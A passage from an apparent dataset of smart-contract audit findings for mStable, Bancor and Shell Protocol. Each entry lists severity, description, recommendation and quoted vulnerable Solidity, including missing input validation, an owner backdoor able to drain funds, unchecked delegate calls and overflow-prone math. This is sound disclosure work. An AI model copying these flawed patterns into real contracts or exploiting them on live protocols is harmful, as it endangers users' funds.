balance\\n basket.bassets[i].vaultBalance = balance;\\n```\\n\\nThe regular updates due to interest collection should ensure that the difference stays relatively small. However, note that the following scenarios is feasible: assuming there is 0 DAI in the basket, a user mints X mUSD by depositing X DAI. While the interest collection hasn't been triggered yet, the user tries to redeem X mUSD for DAI. This may fail since the amount of DAI in the lending pool is smaller than X.",It seems like this issue could be fixed by using the balance increase from the lending pool to update the vault balance (much like for the scenario where transfer fees are charged) instead of using the amount received.,,"```\\nquantityDeposited = \\_amount;\\n\\nif(\\_isTokenFeeCharged) {\\n // If we charge a fee, account for it\\n uint256 prevBal = \\_checkBalance(cToken);\\n require(cToken.mint(\\_amount) == 0, ""cToken mint failed"");\\n uint256 newBal = \\_checkBalance(cToken);\\n quantityDeposited = \\_min(quantityDeposited, newBal.sub(prevBal));\\n} else {\\n // Else just execute the mint\\n require(cToken.mint(\\_amount) == 0, ""cToken mint failed"");\\n}\\n\\nemit Deposit(\\_bAsset, address(cToken), quantityDeposited);\\n```\\n" +Missing validation in Masset._redeemTo Acknowledged,medium,"In function `_redeemTo` the collateralisation ratio is not taken into account unlike in _redeemMasset:\\n```\\nuint256 colRatio = StableMath.min(props.colRatio, StableMath.getFullScale());\\n\\n// Ensure payout is related to the collateralised mAsset quantity\\nuint256 collateralisedMassetQuantity = \\_mAssetQuantity.mulTruncate(colRatio);\\n```\\n\\nIt seems like `_redeemTo` should not be executed if the collateralisation ratio is below 100%. However, the contracts (that is, `Masset` and ForgeValidator) themselves don't seem to enforce this explicitly. Instead, the governor needs to ensure that the collateralisation ratio is only set to a value below 100% when the basket is not “healthy” (for instance, if it is considered “failed”). Failing to ensure this may allow an attacker to redeem a disproportionate amount of assets. Note that the functionality for setting the collateralisation ratio is not currently implemented in the audited code.","Consider enforcing the intended use of `_redeemTo` more explicitly. For instance, it might be possible to introduce additional input validation by requiring that the collateralisation ratio is not below 100%.",,"```\\nuint256 colRatio = StableMath.min(props.colRatio, StableMath.getFullScale());\\n\\n// Ensure payout is related to the collateralised mAsset quantity\\nuint256 collateralisedMassetQuantity = \\_mAssetQuantity.mulTruncate(colRatio);\\n```\\n" +Removing a bAsset might leave some tokens stuck in the vault Acknowledged,low,"In function `_removeBasset` there is existing validation to make sure only “empty” vaults are removed:\\n```\\nrequire(bAsset.vaultBalance == 0, ""bAsset vault must be empty"");\\n```\\n\\nHowever, this is not necessarily sufficient since the lending pool balance may be higher than the vault balance. The reason is that the vault balance is usually slightly out-of-date due to the 30 minutes time span between interest collections. Consider the scenario: (1) a user swaps out an asset 29 minutes after the last interest collection to reduce its vault balance from 100 USD to 0, and (2) the governor subsequently remove the asset. During those 29 minutes the asset was collecting interest (according to the lending pool the balance was higher than 100 USD at the time of the swap) that is now “stuck” in the vault.","Consider adding additional input validation (for instance, by requiring that the lending pool balance to be 0) or triggering a swap directly when removing an asset from the basket.",,"```\\nrequire(bAsset.vaultBalance == 0, ""bAsset vault must be empty"");\\n```\\n" +Unused parameter in BasketManager._addBasset Won't Fix,low,"It seems like the `_measurementMultiple` parameter is always `StableMath.getRatioScale()` (1e8). There is also some range validation code that seems unnecessary if the parameter is always 1e8.\\n```\\nrequire(\\_measurementMultiple >= 1e6 && \\_measurementMultiple <= 1e10, ""MM out of range"");\\n```\\n",Consider removing the parameter and the input validation to improve the readability of the code.,,"```\\nrequire(\\_measurementMultiple >= 1e6 && \\_measurementMultiple <= 1e10, ""MM out of range"");\\n```\\n" +Assumptions are made about interest distribution Won't Fix,low,"There is a mechanism that prevents interest collection if the extrapolated APY exceeds a threshold (MAX_APY).\\n```\\nrequire(extrapolatedAPY < MAX\\_APY, ""Interest protected from inflating past maxAPY"");\\n```\\n\\nThe extrapolation seems to assume that the interest is payed out frequently and continuously. It seems like a less frequent payout (for instance, once a month/year) could be rejected since the extrapolation considers the interest since the last time that `collectAndDistributeInterest` was called (potentially without interest being collected).","Consider revisiting or documenting this assumption. For instance, one could consider extrapolating between the current time and the last time that (non-zero) interest was actually collected.",,"```\\nrequire(extrapolatedAPY < MAX\\_APY, ""Interest protected from inflating past maxAPY"");\\n```\\n" +Assumptions are made about Aave and Compound integrations Acknowledged,low,"The code makes several assumptions about the Aave and Compound integrations. A malicious or malfunctioning integration (or lending pool) might violate those assumptions. This might lead to unintended behavior in the system. Below are three such assumptions:\\nfunction `checkBalance` reverts if the token hasn't been added:\\n```\\nIPlatformIntegration(\\_integration).checkBalance(\\_bAsset);\\n```\\n\\nfunction `withdraw` is trusted to not fail when it shouldn't:\\n```\\nIPlatformIntegration(\\_integrators[i]).withdraw(\\_recipient, bAsset, q, \\_bAssets[i].isTransferFeeCharged);\\n```\\n\\nthe mapping from mAssets to pTokens is fixed:\\n```\\nrequire(bAssetToPToken[\\_bAsset] == address(0), ""pToken already set"");\\n```\\n\\nThe first assumption could be avoided by adding a designated function to check if the token was added.\\nThe second assumption is more difficult to avoid, but should be considered when adding new integrations. The system needs to trust the lending pools to work properly; for instance, if the lending pool would blacklist the integration contract the system may behave in unintended ways.\\nThe third assumption could be avoided, but it comes at a cost.","Consider revisiting or avoiding these assumptions. For any assumptions that are there by design it would be good to document them to facilitate future changes. One should also be careful to avoid coupling between external systems. For instance, if withdrawing from Aave fails this should not prevent withdrawing from Compound.",,```\\nIPlatformIntegration(\\_integration).checkBalance(\\_bAsset);\\n```\\n +Assumptions are made about bAssets Acknowledged,low,"The code makes several assumptions about the bAssets that can be used. A malicious or malfunctioning asset contract might violate those assumptions. This might lead to unintended behavior in the system. Below there are several such assumptions:\\nDecimals of a bAsset are constant where the decimals are used to derive the asset's ratio:\\n```\\nuint256 bAsset\\_decimals = CommonHelpers.getDecimals(\\_bAsset);\\n```\\n\\nDecimals must be in a range from 4 to 18:\\n```\\nrequire(decimals >= 4 && decimals <= 18, ""Token must have sufficient decimal places"");\\n```\\n\\nThe governor is able to foresee when transfer fees are charged (which needs to be called if anything changes); in theory, assets could be much more flexible in when transfer fees are charged (for instance, during certain periods or for certain users)\\n```\\nfunction setTransferFeesFlag(address \\_bAsset, bool \\_flag)\\n```\\n\\nIt seems like some of these assumptions could be avoided, but there might be a cost. For instance, one could retrieve the decimals directly instead of “caching” them and one could always enable the setting where transfer fees may be charged.",Consider revisiting or avoiding these assumptions. For any assumptions that are there by design it would be good to document them to facilitate future changes.,,```\\nuint256 bAsset\\_decimals = CommonHelpers.getDecimals(\\_bAsset);\\n```\\n +Unused field in ForgePropsMulti struct Won't Fix,low,"The `ForgePropsMulti` struct defines the field `isValid` which always seems to be true:\\n```\\n/\\*\\* @dev All details needed to Forge with multiple bAssets \\*/\\nstruct ForgePropsMulti {\\n bool isValid; // Flag to signify that forge bAssets have passed validity check\\n Basset[] bAssets;\\n address[] integrators;\\n uint8[] indexes;\\n}\\n```\\n\\nIf it is indeed always true, one could remove the following line:\\n```\\nif(!props.isValid) return 0;\\n```\\n",If the field is indeed always true please consider removing it to simplify the code.,,```\\n/\\*\\* @dev All details needed to Forge with multiple bAssets \\*/\\nstruct ForgePropsMulti {\\n bool isValid; // Flag to signify that forge bAssets have passed validity check\\n Basset[] bAssets;\\n address[] integrators;\\n uint8[] indexes;\\n}\\n```\\n +BassetStatus enum defines multiple unused states Won't Fix,low,"The `BassetStatus` enum defines several values that do not seem to be assigned in the code:\\nDefault (different from “Normal”?)\\nBlacklisted\\nLiquidating\\nLiquidated\\nFailed\\n```\\n/\\*\\* @dev Status of the Basset - has it broken its peg? \\*/\\nenum BassetStatus {\\n Default,\\n Normal,\\n BrokenBelowPeg,\\n BrokenAbovePeg,\\n Blacklisted,\\n Liquidating,\\n Liquidated,\\n Failed\\n}\\n```\\n\\nSince some of these are used in the code there might be some dead code that can be removed as a result. For example:\\n```\\n\\_bAsset.status == BassetStatus.Liquidating ||\\n\\_bAsset.status == BassetStatus.Blacklisted\\n```\\n",If those values are indeed never used please consider removing them to simplify the code.,,"```\\n/\\*\\* @dev Status of the Basset - has it broken its peg? \\*/\\nenum BassetStatus {\\n Default,\\n Normal,\\n BrokenBelowPeg,\\n BrokenAbovePeg,\\n Blacklisted,\\n Liquidating,\\n Liquidated,\\n Failed\\n}\\n```\\n" +Potential gas savings by terminating early Acknowledged,low,"If a function invocation is bound to revert, one should try to revert as soon as possible to save gas. In `ForgeValidator.validateRedemption` it is possible to terminate more early:\\n```\\nif(atLeastOneBecameOverweight) return (false, ""bAssets must remain below max weight"", false);\\n```\\n","Consider moving the require-statement a few lines up (for instance, after assigning to atLeastOneBecameOverweight).",,"```\\nif(atLeastOneBecameOverweight) return (false, ""bAssets must remain below max weight"", false);\\n```\\n" +Discrepancy between code and comments,low,"There is a discrepancy between the code at:\\n```\\nrequire(weightSum >= 1e18 && weightSum <= 4e18, ""Basket weight must be >= 100 && <= 400%"");\\n```\\n\\nAnd the comment at:\\n```\\n\\* @dev Throws if the total Basket weight does not sum to 100\\n```\\n",Update the code or the comment to be consistent.,,"```\\nrequire(weightSum >= 1e18 && weightSum <= 4e18, ""Basket weight must be >= 100 && <= 400%"");\\n```\\n" +Loss of the liquidity pool is not equally distributed,high,"All stakeholders in the liquidity pool should be able to withdraw the same amount as they staked plus a share of fees that the converter earned during their staking period.\\n```\\n IPoolTokensContainer(anchor).burn(\\_poolToken, msg.sender, \\_amount);\\n\\n // calculate how much liquidity to remove\\n // if the entire supply is liquidated, the entire staked amount should be sent, otherwise\\n // the price is based on the ratio between the pool token supply and the staked balance\\n uint256 reserveAmount = 0;\\n if (\\_amount == initialPoolSupply)\\n reserveAmount = balance;\\n else\\n reserveAmount = \\_amount.mul(balance).div(initialPoolSupply);\\n\\n // sync the reserve balance / staked balance\\n reserves[reserveToken].balance = reserves[reserveToken].balance.sub(reserveAmount);\\n uint256 newStakedBalance = stakedBalances[reserveToken].sub(reserveAmount);\\n stakedBalances[reserveToken] = newStakedBalance;\\n```\\n\\nThe problem is that sometimes there might not be enough funds in reserve (for example, due to this issue https://github.com/ConsenSys/bancor-audit-2020-06/issues/4). So the first ones who withdraw their stakes receive all the tokens they own. But the last stakeholders might not be able to get their funds back because the pool is empty already.\\nSo under some circumstances, there is a chance that users can lose all of their staked funds.\\nThis issue also has the opposite side: if the liquidity pool makes an extra profit, the stakers do not owe this profit and cannot withdraw it.","Resolution\\nThe issue was addressed by adding a new fee mechanism called ‘adjusted fees'. This mechanism aims to decrease the deficit of the reserves over time. If there is a deficit of reserves, it is usually present on the secondary token side, because there is a strong incentive to bring the primary token to the balanced state. Roughly speaking, the idea is that if the secondary token has a deficit in reserves, there are additional fees for trading that token. These fees are not distributed across the liquidity providers like the regular fees. Instead, they are just populating the reserve, decreasing the existing deficit.\\nLoss is still not distributed across the liquidity providers, and there is a possibility that there are not enough funds for everyone to withdraw them. In the case of a run on reserves, LPs will be able to withdraw funds on a first-come-first-serve basis.\\nDistribute losses evenly across the liquidity providers.",,"```\\n IPoolTokensContainer(anchor).burn(\\_poolToken, msg.sender, \\_amount);\\n\\n // calculate how much liquidity to remove\\n // if the entire supply is liquidated, the entire staked amount should be sent, otherwise\\n // the price is based on the ratio between the pool token supply and the staked balance\\n uint256 reserveAmount = 0;\\n if (\\_amount == initialPoolSupply)\\n reserveAmount = balance;\\n else\\n reserveAmount = \\_amount.mul(balance).div(initialPoolSupply);\\n\\n // sync the reserve balance / staked balance\\n reserves[reserveToken].balance = reserves[reserveToken].balance.sub(reserveAmount);\\n uint256 newStakedBalance = stakedBalances[reserveToken].sub(reserveAmount);\\n stakedBalances[reserveToken] = newStakedBalance;\\n```\\n" +Use of external calls with a fixed amount of gas Won't Fix,medium,"The converter smart contract uses the Solidity transfer() function to transfer Ether.\\n.transfer() and .send() forward exactly 2,300 gas to the recipient. The goal of this hardcoded gas stipend was to prevent reentrancy vulnerabilities, but this only makes sense under the assumption that gas costs are constant. Recently EIP 1884 was included in the Istanbul hard fork. One of the changes included in EIP 1884 is an increase to the gas cost of the SLOAD operation, causing a contract's fallback function to cost more than 2300 gas.\\n```\\n\\_to.transfer(address(this).balance);\\n```\\n\\n```\\nif (\\_targetToken == ETH\\_RESERVE\\_ADDRESS)\\n```\\n\\n```\\nmsg.sender.transfer(reserveAmount);\\n```\\n","Resolution\\nIt was decided to accept this minor risk as the usage of .call() might introduce other unexpected behavior.\\nIt's recommended to stop using .transfer() and .send() and instead use .call(). Note that .call() does nothing to mitigate reentrancy attacks, so other precautions must be taken. To prevent reentrancy attacks, it is recommended that you use the checks-effects-interactions pattern.",,```\\n\\_to.transfer(address(this).balance);\\n```\\n +Use of assert statement for input validation,low,"Solidity assertion should only be used to assert invariants, i.e. statements that are expected to always hold if the code behaves correctly. Note that all available gas is consumed when an assert-style exception occurs.\\nIt appears that assert() is used in one location within the test scope to catch invalid user inputs:\\n```\\nassert(amount < targetReserveBalance);\\n```\\n",Using `require()` instead of `assert()`.,,```\\nassert(amount < targetReserveBalance);\\n```\\n +Certain functions lack input validation routines,high,"The functions should first check if the passed arguments are valid first. The checks-effects-interactions pattern should be implemented throughout the code.\\nThese checks should include, but not be limited to:\\n`uint` should be larger than `0` when `0` is considered invalid\\n`uint` should be within constraints\\n`int` should be positive in some cases\\nlength of arrays should match if more arrays are sent as arguments\\naddresses should not be `0x0`\\nThe function `includeAsset` does not do any checks before changing the contract state.\\n```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n\\nThe internal function called by the public method `includeAsset` again doesn't check any of the data.\\n```\\nfunction includeAsset (Shells.Shell storage shell, address \\_numeraire, address \\_numeraireAssim, address \\_reserve, address \\_reserveAssim, uint256 \\_weight) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssimilator = shell.assimilators[\\_numeraire];\\n\\n \\_numeraireAssimilator.addr = \\_numeraireAssim;\\n\\n \\_numeraireAssimilator.ix = uint8(shell.numeraires.length);\\n\\n shell.numeraires.push(\\_numeraireAssimilator);\\n\\n Assimilators.Assimilator storage \\_reserveAssimilator = shell.assimilators[\\_reserve];\\n\\n \\_reserveAssimilator.addr = \\_reserveAssim;\\n\\n \\_reserveAssimilator.ix = uint8(shell.reserves.length);\\n\\n shell.reserves.push(\\_reserveAssimilator);\\n\\n shell.weights.push(\\_weight.divu(1e18).add(uint256(1).divu(1e18)));\\n\\n}\\n```\\n\\nSimilar with `includeAssimilator`.\\n```\\nfunction includeAssimilator (address \\_numeraire, address \\_derivative, address \\_assimilator) public onlyOwner {\\n shell.includeAssimilator(\\_numeraire, \\_derivative, \\_assimilator);\\n}\\n```\\n\\nAgain no checks are done in any function.\\n```\\nfunction includeAssimilator (Shells.Shell storage shell, address \\_numeraire, address \\_derivative, address \\_assimilator) internal {\\n\\n Assimilators.Assimilator storage \\_numeraireAssim = shell.assimilators[\\_numeraire];\\n\\n shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n // shell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix, 0, 0);\\n\\n}\\n```\\n\\nNot only does the administrator functions not have any checks, but also user facing functions do not check the arguments.\\nFor example `swapByOrigin` does not check any of the arguments if you consider it calls `MainnetDaiToDaiAssimilator`.\\n```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n\\nIt calls `transferByOrigin` and we simplify this example and consider we have `_o.ix == _t.ix`\\n```\\nfunction transferByOrigin (address \\_origin, address \\_target, uint256 \\_dline, uint256 \\_mTAmt, uint256 \\_oAmt, address \\_rcpnt) public notFrozen nonReentrant returns (uint256 tAmt\\_) {\\n\\n Assimilators.Assimilator memory \\_o = shell.assimilators[\\_origin];\\n Assimilators.Assimilator memory \\_t = shell.assimilators[\\_target];\\n\\n // TODO: how to include min target amount\\n if (\\_o.ix == \\_t.ix) return \\_t.addr.outputNumeraire(\\_rcpnt, \\_o.addr.intakeRaw(\\_oAmt));\\n```\\n\\nIn which case it can call 2 functions on an assimilatior such as `MainnetDaiToDaiAssimilator`.\\nThe first called function is `intakeRaw`.\\n```\\n// transfers raw amonut of dai in, wraps it in cDai, returns numeraire amount\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_, int128 balance\\_) {\\n\\n dai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nAnd its result is used in `outputNumeraire` that again does not have any checks.\\n```\\n// takes numeraire amount of dai, unwraps corresponding amount of cDai, transfers that out, returns numeraire amount\\nfunction outputNumeraire (address \\_dst, int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n amount\\_ = \\_amount.mulu(1e18);\\n\\n dai.transfer(\\_dst, amount\\_);\\n\\n return amount\\_;\\n\\n}\\n```\\n",Resolution\\nComment from the development team:\\nNow all functions in the Orchestrator revert on incorrect arguments.\\nAll functions in Loihi in general revert on incorrect arguments.\\nImplement the `checks-effects-interactions` as a pattern to write code. Add tests that check if all of the arguments have been validated.\\nConsider checking arguments as an important part of writing code and developing the system.,,"```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n" +Remove Loihi methods that can be used as backdoors by the administrator,high,"There are several functions in `Loihi` that give extreme powers to the shell administrator. The most dangerous set of those is the ones granting the capability to add assimilators.\\nSince assimilators are essentially a proxy architecture to delegate code to several different implementations of the same interface, the administrator could, intentionally or unintentionally, deploy malicious or faulty code in the implementation of an assimilator. This means that the administrator is essentially totally trusted to not run code that, for example, drains the whole pool or locks up the users' and LPs' tokens.\\nIn addition to these, the function `safeApprove` allows the administrator to move any of the tokens the contract holds to any address regardless of the balances any of the users have.\\nThis can also be used by the owner as a backdoor to completely drain the contract.\\n```\\nfunction safeApprove(address \\_token, address \\_spender, uint256 \\_value) public onlyOwner {\\n\\n (bool success, bytes memory returndata) = \\_token.call(abi.encodeWithSignature(""approve(address,uint256)"", \\_spender, \\_value));\\n\\n require(success, ""SafeERC20: low-level call failed"");\\n\\n}\\n```\\n","Remove the `safeApprove` function and, instead, use a trustless escape-hatch mechanism like the one suggested in issue 6.1.\\nFor the assimilator addition functions, our recommendation is that they are made completely internal, only callable in the constructor, at deploy time.\\nEven though this is not a big structural change (in fact, it reduces the attack surface), it is, indeed, a feature loss. However, this is the only way to make each shell a time-invariant system.\\nThis would not only increase Shell's security but also would greatly improve the trust the users have in the protocol since, after deployment, the code is now static and auditable.",,"```\\nfunction safeApprove(address \\_token, address \\_spender, uint256 \\_value) public onlyOwner {\\n\\n (bool success, bytes memory returndata) = \\_token.call(abi.encodeWithSignature(""approve(address,uint256)"", \\_spender, \\_value));\\n\\n require(success, ""SafeERC20: low-level call failed"");\\n\\n}\\n```\\n" +Assimilators should implement an interface,high,"The Assimilators are one of the core components within the application. They are used to move the tokens and can be thought of as a “middleware” between the Shell Protocol application and any other supported tokens.\\nThe methods attached to the assimilators are called throughout the application and they are a critical component of the whole system. Because of this fact, it is extremely important that they behave correctly.\\nA suggestion to restrict the possibility of errors when implementing them and when using them is to make all of the assimilators implement a unique specific interface. This way, any deviation would be immediately observed, right when the compilation happens.\\nConsider this example. The user calls `swapByOrigin`.\\n```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n\\nWhich calls `transferByOrigin`. In `transferByOrigin`, if the origin index matches the target index, a different execution branch is activated.\\n```\\nif (\\_o.ix == \\_t.ix) return \\_t.addr.outputNumeraire(\\_rcpnt, \\_o.addr.intakeRaw(\\_oAmt));\\n```\\n\\nIn this case we need the output of `_o.addr.intakeRaw(_oAmt)`.\\nIf we pick a random assimilator and check the implementation, we see the function `intakeRaw` needs to return the transferred amount.\\n```\\n// takes raw cdai amount, transfers it in, calculates corresponding numeraire amount and returns it\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_) {\\n\\n bool success = cdai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n if (!success) revert(""CDai/transferFrom-failed"");\\n\\n uint256 \\_rate = cdai.exchangeRateStored();\\n\\n \\_amount = ( \\_amount \\* \\_rate ) / 1e18;\\n\\n cdai.redeemUnderlying(\\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nHowever, with other implementations, the returns do not match. In the case of `MainnetDaiToDaiAssimilator`, it returns 2 values, which will make the `Loihi` contract work in this case but can misbehave in other cases, or even fail.\\n```\\n// transfers raw amonut of dai in, wraps it in cDai, returns numeraire amount\\nfunction intakeRaw (uint256 \\_amount) public returns (int128 amount\\_, int128 balance\\_) {\\n\\n dai.transferFrom(msg.sender, address(this), \\_amount);\\n\\n amount\\_ = \\_amount.divu(1e18);\\n\\n}\\n```\\n\\nMaking all the assimilators implement one unique interface will enforce the functions to look the same from the outside.",Create a unique interface for the assimilators and make all the contracts implement that interface.,,"```\\nfunction swapByOrigin (address \\_o, address \\_t, uint256 \\_oAmt, uint256 \\_mTAmt, uint256 \\_dline) public notFrozen returns (uint256 tAmt\\_) {\\n\\n return transferByOrigin(\\_o, \\_t, \\_dline, \\_mTAmt, \\_oAmt, msg.sender);\\n\\n}\\n```\\n" +Assimilators do not conform to the ERC20 specification,medium,"The assimilators in the codebase make heavy usage of both the `transfer` and `transferFrom` methods in the ERC20 standard.\\nQuoting the relevant parts of the specification of the standard:\\nTransfers _value amount of tokens to address _to, and MUST fire the Transfer event. The function SHOULD throw if the message caller's account balance does not have enough tokens to spend.\\nThe transferFrom method is used for a withdraw workflow, allowing contracts to transfer tokens on your behalf. This can be used for example to allow a contract to transfer tokens on your behalf and/or to charge fees in sub-currencies. The function SHOULD throw unless the _from account has deliberately authorized the sender of the message via some mechanism.\\nWe can see that, even though it is suggested that ERC20-compliant tokens do `throw` on the lack of authorization from the sender or lack of funds to complete the transfer, the standard does not enforce it.\\nThis means that, in order to make the system both more resilient and future-proof, code in each implementation of current and future assimilators should check for the return value of both `transfer` and `transferFrom` call instead of just relying on the external contract to revert execution.\\nThe extent of this issue is only mitigated by the fact that new assets are only added by the shell administrator and could, therefore, be audited prior to their addition.\\nNon-exhaustive Examples\\n```\\ndai.transferFrom(msg.sender, address(this), \\_amount);\\n```\\n\\n```\\ndai.transfer(\\_dst, \\_amount);\\n```\\n","Add a check for the return boolean of the function.\\nExample:\\n`require(dai.transferFrom(msg.sender, address(this), _amount) == true);`",,"```\\ndai.transferFrom(msg.sender, address(this), \\_amount);\\n```\\n" +Access to assimilators does not check for existence and allows delegation to the zeroth address,medium,"For every method that allows to selectively withdraw, deposit, or swap tokens in `Loihi`, the user is allowed to specify addresses for the assimilators of said tokens (by inputting the addresses of the tokens themselves).\\nThe shell then performs a lookup on a mapping called `assimilators` inside its main structure and uses the result of that lookup to delegate call the assimilator deployed by the shell administrator.\\nHowever, there are no checks for prior instantiation of a specific, supported token, effectively meaning that we can do a lookup on an all-zeroed-out member of that mapping and delegate call execution to the zeroth address.\\nFor example, the 32 bytes expected as a result of this call:\\n```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n\\nThis is definitely an insufficient check since the interface for the assimilators might change in the future to include functions that have no return values.",Check for the prior instantiation of assimilators by including the following requirement:\\n`require(shell.assimilators[].ix != 0);`\\nIn all the functions that access the `assimilators` mapping and change the indexes to be 1-based instead pf 0-based.,,"```\\nfunction viewNumeraireAmount (address \\_assim, uint256 \\_amt) internal returns (int128 amt\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewNumeraireAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n\\n amt\\_ = abi.decode(\\_assim.delegate(data), (int128)); // for development\\n\\n}\\n```\\n" +Math library's fork has problematic changes,medium,"The math library ABDK Libraries for Solidity was forked and modified to add a few `unsafe_*` functions.\\n`unsafe_add`\\n`unsafe_sub`\\n`unsafe_mul`\\n`unsafe_div`\\n`unsafe_abs`\\nThe problem which was introduced is that `unsafe_add` ironically is not really unsafe, it is as safe as the original `add` function. It is, in fact, identical to the safe `add` function.\\n```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n\\n```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction unsafe\\_add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n\\nFortunately, `unsafe_add` is not used anywhere in the code.\\nHowever, `unsafe_abs` was changed from this:\\n```\\n/\\*\\*\\n \\* Calculate |x|. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction abs (int128 x) internal pure returns (int128) {\\n require (x != MIN\\_64x64);\\n return x < 0 ? -x : x;\\n}\\n```\\n\\nTo this:\\n```\\n/\\*\\*\\n \\* Calculate |x|. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction unsafe\\_abs (int128 x) internal pure returns (int128) {\\n return x < 0 ? -x : x;\\n}\\n```\\n\\nThe check that was removed, is actually an important check:\\n```\\nrequire (x != MIN\\_64x64);\\n```\\n\\n```\\nint128 private constant MIN\\_64x64 = -0x80000000000000000000000000000000;\\n```\\n\\nThe problem is that for an `int128` variable that is equal to `-0x80000000000000000000000000000000`, there is no absolute value within the constraints of `int128`.\\nStarting from int128 `n` = `-0x80000000000000000000000000000000`, the absolute value should be int128 `abs_n` = -n, however `abs_n` is equal to the initial value of `n`. The final value of `abs_n` is still `-0x80000000000000000000000000000000`. It's still not a positive or zero value. The operation `0 - n` wraps back to the same initial value.","Remove unused `unsafe_*` functions and try to find other ways of doing unsafe math (if it is fundamentally important) without changing existing, trusted, already audited code.",,"```\\n/\\*\\*\\n \\* Calculate x + y. Revert on overflow.\\n \\*\\n \\* @param x signed 64.64-bit fixed point number\\n \\* @param y signed 64.64-bit fixed point number\\n \\* @return signed 64.64-bit fixed point number\\n \\*/\\nfunction add (int128 x, int128 y) internal pure returns (int128) {\\n int256 result = int256(x) + y;\\n require (result >= MIN\\_64x64 && result <= MAX\\_64x64);\\n return int128 (result);\\n}\\n```\\n" +Use one file for each contract or library,medium,"The repository contains a lot of contracts and libraries that are added in the same file as another contract or library.\\nOrganizing the code in this manner makes it hard to navigate, develop and audit. It is a best practice to have each contract or library in its own file. The file also needs to bear the name of the hosted contract or library.\\n```\\nlibrary SafeERC20Arithmetic {\\n```\\n\\n```\\nlibrary Shells {\\n```\\n\\n```\\ncontract ERC20Approve {\\n function approve (address spender, uint256 amount) public returns (bool);\\n}\\n```\\n\\n```\\ncontract Loihi is LoihiRoot {\\n```\\n\\n```\\nlibrary Delegate {\\n```\\n\\n```\\nlibrary Assimilators {\\n```\\n",Split up contracts and libraries in single files.,,```\\nlibrary SafeERC20Arithmetic {\\n```\\n +Remove debugging code from the repository,medium,"Throughout the repository, there is source code from the development stage that was used for debugging the functionality and was not removed.\\nThis should not be present in the source code and even if they are used while functionality is developed, they should be removed after the functionality was implemented.\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_int(bytes32, int256);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int128);\\nevent log\\_int(bytes32, int);\\nevent log\\_uint(bytes32, uint);\\nevent log\\_addr(bytes32, address);\\n```\\n\\n```\\nevent log(bytes32);\\n```\\n\\n```\\nevent log(bytes32);\\nevent log\\_int(bytes32, int256);\\nevent log\\_ints(bytes32, int256[]);\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_uints(bytes32, uint256[]);\\n```\\n\\n```\\nevent log\\_int(bytes32, int);\\nevent log\\_ints(bytes32, int128[]);\\nevent log\\_uint(bytes32, uint);\\nevent log\\_uints(bytes32, uint[]);\\nevent log\\_addrs(bytes32, address[]);\\n```\\n\\n```\\nevent log\\_uint(bytes32, uint256);\\nevent log\\_int(bytes32, int256);\\n```\\n\\n```\\nevent log\\_uint(bytes32, 